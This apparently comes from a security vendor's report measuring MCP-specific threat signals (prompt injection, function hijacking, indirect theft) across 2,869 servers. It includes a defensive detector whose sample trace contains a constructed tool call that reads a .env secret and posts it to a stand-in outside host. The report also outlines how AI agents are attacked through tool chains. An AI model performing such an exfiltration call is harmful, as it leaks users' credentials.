MCP-Specific Threat Signals Across 2,869 Servers: What We Observed and What Remains Unproven
Out of 2,869 unique MCP servers, 228 servers (7.9%) showed MCP-specific threat signals. Prompt Injection, Function Hijacking, and PleaseFix Attack overlapped on the same 134 servers, while Indirect Theft was observed on 113 servers through a partly separate path. In this dataset, none of these signals were observed on their own; every detected case also showed conventional threat signals.
Terminology
| Term | Meaning |
|---|---|
| MCP-specific threat signal | A threat pattern observed in the context of AI-agent behavior or MCP interaction |
| Conventional threat signal | A threat pattern such as Shell RCE or SSRF that predates MCP |
| Co-occurrence | Multiple threat signals observed on the same server |
| Observation scope | The range directly covered by this dataset. Zero detections do not prove absence |
Lead
Did MCP and AI agents really introduce new attack surfaces? The useful way to approach that question is not through theory alone, but by asking where concrete threat signals were actually observed.
This report reviews six MCP-specific threat patterns across 2,869 unique MCP servers. The focus is on which patterns overlapped, how they related to conventional threats, and what still remains unproven.
Key Findings
- 228 servers (7.9%) showed at least one MCP-specific threat signal.
- Prompt Injection, Function Hijacking, and PleaseFix Attack were observed on the same 134 servers in this dataset.
- Indirect Theft was observed on 113 servers and was strongly associated with outbound transmission or cross-server relay.
- In this dataset, no server showed MCP-specific threat signals without also showing conventional threat signals.
- Servers with MCP-specific threat signals had a 58.8% BLOCK rate, compared with 32.7% for servers that showed only conventional threats.
- Tool Poisoning and Tool Name Collision had zero detections within the current observation scope.
Dataset
| Item | Value |
|---|---|
| Total population | 2,869 unique MCP servers |
| MCP-specific threat patterns tracked | 6 |
| Servers with at least one MCP-specific threat signal | 228 |
| Observation window | April 2026 |
Detection Status of MCP-Specific Threat Signals
| Threat Pattern | Detections | Detection Rate |
|---|---|---|
| Prompt Injection | 134 | 4.7% |
| PleaseFix Attack | 134 | 4.7% |
| Function Hijacking | 134 | 4.7% |
| Indirect Theft | 113 | 3.9% |
| Tool Poisoning | 0 | 0.0% |
| Tool Name Collision | 0 | 0.0% |
The first notable pattern is that the top three signals have identical counts.
Understanding what kind of capability cluster sat behind that overlap is the main question for this article.
The Three Signals That Overlapped on 134 Servers
Co-occurrence analysis produced the following results.
| Threat Pair | Co-occurring Servers |
|---|---|
| Prompt Injection + PleaseFix Attack | 134 |
| Prompt Injection + Function Hijacking | 134 |
| PleaseFix Attack + Function Hijacking | 134 |
In this dataset, the three signals were observed together on the same server group.
That overlap closely matched the 134 servers discussed in Part 4 that exposed dynamic code execution capability.
The correct takeaway is limited: in this dataset, the three signals concentrated around the same capability group.
That does not prove a universal law. It does indicate that when AI-agent interaction and execution-oriented capability converge on the same server, these three signals tended to emerge together.
Indirect Theft Also Appeared Through a Separate Path
Indirect Theft was observed on 113 servers.
It partly overlaps with the three-signal group, but the two server sets are not identical.
| Comparison | Three-signal overlap group | Indirect Theft |
|---|---|---|
| Detections | 134 | 113 |
| Commonly associated capability | Dynamic code execution | Outbound transmission / cross-server relay |
| Overlap pattern | Same 134 servers | Partial overlap only |
Within the 113 Indirect Theft detections:
| Commonly Associated Capability | Servers | Percentage |
|---|---|---|
| Outbound transmission | 88 | 77.9% |
| Cross-server relay | 38 | 33.6% |
Some servers had both capabilities, so the totals exceed 113.
This matters because it shows that MCP-specific threat signals do not all arise through the same operational path. Even without code execution, outbound transmission or cross-server relay can create a different risk route.
Of the 134 servers with Prompt Injection, only 19 (14.2%) also showed Indirect Theft.
So Indirect Theft cannot be explained solely by the three-signal overlap group.
Relationship With Conventional Threats
| Server Category | Servers |
|---|---|
| Conventional threats only | 257 |
| MCP-specific threats only | 0 |
| Both | 228 |
| No threats | 2,384 |
In this dataset, zero servers showed MCP-specific threat signals alone.
This is not proof that MCP-specific threats must always be accompanied by conventional ones in every future dataset.
It does suggest that, here, the capabilities associated with MCP-specific signals also tended to create conventional attack surfaces at the same time.
Average threat counts across the 228 servers were:
| Metric | Value |
|---|---|
| Average total threats | 4.7 |
| Average MCP-specific threats | 2.3 |
| Average conventional threats | 2.4 |
The near-even split means that looking at only one side gives an incomplete view of actual exposure.
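The co-occurrence and category tables above can be recomputed from per-server signal sets. The following is an added example, not the report's own tooling: the population is constructed, and only the group sizes are derived from the figures reported here (134, 113, the 19-server overlap, 257, 2,384).

```python
from collections import Counter
from itertools import combinations

PI, PF, FH, IT = ("Prompt Injection", "PleaseFix Attack",
                  "Function Hijacking", "Indirect Theft")

def build_population():
    """Constructed records: (set of MCP-specific signals, has conventional signal).
    Group sizes are derived from the report's aggregates; the servers are not real."""
    trio = frozenset({PI, PF, FH})
    groups = [
        (134 - 19, trio, True),            # three-signal group without Indirect Theft
        (19, trio | {IT}, True),           # three-signal group with Indirect Theft
        (113 - 19, frozenset({IT}), True), # Indirect Theft without the trio
        (257, frozenset(), True),          # conventional signals only
        (2384, frozenset(), False),        # no signals
    ]
    return [(mcp, conv) for n, mcp, conv in groups for _ in range(n)]

def summarize(servers):
    """Per-signal counts, pairwise co-occurrence, category split, average MCP signals."""
    per_signal, pairs, category = Counter(), Counter(), Counter()
    for mcp, conv in servers:
        per_signal.update(mcp)
        pairs.update(frozenset(p) for p in combinations(sorted(mcp), 2))
        if mcp and conv:
            category["both"] += 1
        elif mcp:
            category["mcp_only"] += 1
        elif conv:
            category["conventional_only"] += 1
        else:
            category["none"] += 1
    flagged = [mcp for mcp, _ in servers if mcp]
    avg_mcp = round(sum(len(m) for m in flagged) / len(flagged), 1)
    return per_signal, pairs, category, avg_mcp

if __name__ == "__main__":
    per_signal, pairs, category, avg_mcp = summarize(build_population())
    for pair, n in sorted(pairs.items(), key=lambda kv: -kv[1]):
        print(" + ".join(sorted(pair)), n)
    print(dict(category), "avg MCP-specific signals:", avg_mcp)
```

Inclusion-exclusion ties the figures together: 134 + 113 - 19 = 228 servers with at least one MCP-specific signal.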
BLOCK Rate Comparison
| Server Category | Servers | BLOCK | BLOCK Rate |
|---|---|---|---|
| With MCP-specific threat signals | 228 | 134 | 58.8% |
| Conventional threats only | 257 | 84 | 32.7% |
Servers with MCP-specific threat signals showed a higher BLOCK rate.
However, it would be too strong to say the MCP-specific signals themselves directly caused that gap. A more defensible reading is that high-risk capabilities such as execution or outbound transmission were often present at the same time, and those broader capability clusters were strongly associated with BLOCK verdicts.
The Two Zero-Detection Patterns
| Threat Pattern | Detections | Likely Reason Within Current Scope |
|---|---|---|
| Tool Poisoning | 0 | Requires evaluating intent and manipulation inside tool definitions, which is harder to capture in simple aggregate analysis |
| Tool Name Collision | 0 | Depends on multi-server environments and is difficult to surface from single-server observation alone |
Zero detections do not mean the threats do not exist.
They more likely indicate that these patterns are harder to observe inside the current scope and single-server-centered dataset.
Why Conventional Tools Often Miss These Signals
MCP-specific threat signals are not typically assessed by conventional web security tooling. Three reasons stand out.
1. AI-agent mediation
Prompt Injection and PleaseFix Attack depend not only on user input, but on the chain from attacker input to AI-agent judgment to tool execution. Conventional tooling often does not model that full path.
2. MCP semantics
Function Hijacking and Tool Poisoning require understanding tool definitions together with how an AI agent interprets them. That falls outside the normal scope of generic WAF or SAST tooling.
3. Session context
Indirect Theft depends on the context of what data moves where. The same outbound transmission could be legitimate workflow behavior or suspicious exfiltration. That distinction often requires session-level understanding.
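To illustrate the session-context point, here is an added example (not the report's detection method) of a session-level check: an outbound call is flagged only when its body carries data that a sensitive tool returned earlier in the same session. The tool names, allowlisted host, and trace are constructed assumptions.

```python
from dataclasses import dataclass
from urllib.parse import urlparse

# Assumed policy (hypothetical names): tools whose output is sensitive,
# and hosts this workflow is expected to send data to.
SENSITIVE_SOURCES = {"read_file", "query_db"}
ALLOWED_HOSTS = {"api.internal.example"}

@dataclass
class ToolCall:
    session: str
    tool: str
    args: dict
    result: str = ""

def flag_sessions(calls, min_len=16):
    """Return (session, tool, host) for outbound calls to non-allowlisted hosts
    whose body contains a sensitive result seen earlier in the same session."""
    seen = {}       # session -> sensitive results observed so far
    findings = []
    for c in calls:
        if c.tool in SENSITIVE_SOURCES and len(c.result) >= min_len:
            seen.setdefault(c.session, []).append(c.result)
            continue
        url = c.args.get("url")
        if not url:
            continue
        host = urlparse(url).hostname
        if host in ALLOWED_HOSTS:
            continue
        body = str(c.args.get("body", ""))
        if any(s in body for s in seen.get(c.session, [])):
            findings.append((c.session, c.tool, host))
    return findings

SECRET = "DB_PASSWORD=constructed-sample-value"  # constructed sample value
SAMPLE_TRACE = [  # constructed tool-call trace covering three sessions
    ToolCall("s1", "read_file", {"path": "/app/.env"}, SECRET),
    ToolCall("s1", "http_post", {"url": "https://collector.example.net/in", "body": "note: " + SECRET}),
    ToolCall("s2", "http_post", {"url": "https://collector.example.net/in", "body": "weekly report ok"}),
    ToolCall("s3", "read_file", {"path": "/app/.env"}, SECRET),
    ToolCall("s3", "http_post", {"url": "https://api.internal.example/sync", "body": SECRET}),
]

if __name__ == "__main__":
    print(flag_sessions(SAMPLE_TRACE))
```

Sessions s1 and s2 post to the same host, yet only s1 is flagged, because only its body carries previously read sensitive data. Exact substring matching misses re-encoded or chunked data, so an unflagged session is not a cleared one.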
Limitations
- These detections indicate that threat-pattern preconditions were observed, not that attacks were actually executed.
- Zero detections for Tool Poisoning and Tool Name Collision are heavily influenced by the current observation scope.
- The finding that the same 134 servers carried the three-signal overlap is an observed fact in this dataset, not a guarantee about future populations.
- This is a snapshot based on 2,869 unique servers, not a complete census of the entire MCP ecosystem.
Conclusion
Out of 2,869 unique MCP servers, 228 showed MCP-specific threat signals.
Within that group, Prompt Injection, Function Hijacking, and PleaseFix Attack overlapped on the same 134 servers, while Indirect Theft also emerged through outbound transmission and cross-server relay.
The practical lesson is that MCP-specific and conventional threats should not be reviewed in isolation.
Security review needs to examine how AI-specific attack surfaces and conventional attack surfaces compound on the same server.
MCP Guard continuously tracks how MCP-specific and conventional threat signals overlap across MCP servers.
